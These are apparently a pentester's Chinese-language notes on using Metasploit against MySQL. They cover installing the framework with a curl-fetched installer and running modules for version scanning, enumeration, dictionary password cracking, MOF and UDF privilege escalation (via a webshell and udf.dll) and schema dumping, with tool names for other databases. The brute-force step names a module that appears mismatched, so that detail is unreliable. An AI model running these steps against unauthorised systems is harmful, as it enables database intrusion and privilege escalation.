一 簡介 Metasploit是一款可以從多種角度進行勘測的滲透工具
二 使用
1 安裝
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2 使用
msfconsole 進入終端
3 特定命令
1 掃描mysql版本
use auxiliary/scanner/mysql/mysql_version
2 獲取相關信息(包括數據庫數據目錄和相關用戶等)
use auxiliary/admin/mysql/mysql_enum
3 密碼字典暴露破解
use auxiliary/admin/mysql/mysql_sql
set pass_file "/root/top10000pwd.txt"
run
4 根據用戶密碼提權
use exploit/windows/mysql/mysql_mof
run
5 udf 提權
exploit/multi/mysql/mysql_udf_payload
run
6 將mysql_schem導出到本地 /root/.msf4/loot/文件夾下
use auxiliary/scanner/mysql/mysql_schemadump
三 常用命令
1 search mysql 查找mysql相應模塊
2 凡是沒有標注的都需要填寫用戶名等信息
四 補充
1 udf提權
1 UDF(user defined function)用戶自定義函數,是mysql的一個拓展接口。用戶可以通過自定義函數實現在mysql中無法方便實現的功能,其添加的新函數都可以在sql語句中調用,就像調用本機函數一樣。
2 需要使用webshell找到mysql的安裝目錄,並在安裝目錄下創建lib\plugin文件夾,然后將udf.dll文件導出到該目錄,創建類似xCzaUwje.so這樣的文件
3 調用 sys_exec(),需要創建觸發器獲取插件目錄和進入mysql庫權限
4 執行前提
1.獲得一個數據庫賬號,擁有對MySQL的insert和delete權限。以root為佳。
2.擁有將udf.dll寫入相應目錄的權限。
3 需要mysql 5.7 開啟 secure_file_priv 為非NULL,以下是補充
secure_file_priv參數用於限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()傳到哪個指定目錄。
secure_file_priv 為 NULL 時,表示限制mysqld不允許導入或導出。
secure_file_priv 為 /tmp 時,表示限制mysqld只能在/tmp目錄中執行導入導出,其他目錄不能執行。
secure_file_priv 沒有值時,表示不限制mysqld在任意目錄的導入導出。
五 總結
1 不同權限用戶的泄漏會導致不同的信息模塊的收集,有些可能會因為權限不足執行失敗
2 對於某些漏洞的掃描大多基於特定版本,比較落后,沒有什么參考必要
六 推薦網站
https://www.freebuf.com/
七 補充一些其他數據庫的工具
1 oracle
Oscanner tnscmd10g sidguesser
2 sql-sever
mdb-sql sqldict sqlninja
3 sql滲透測試 sqlmap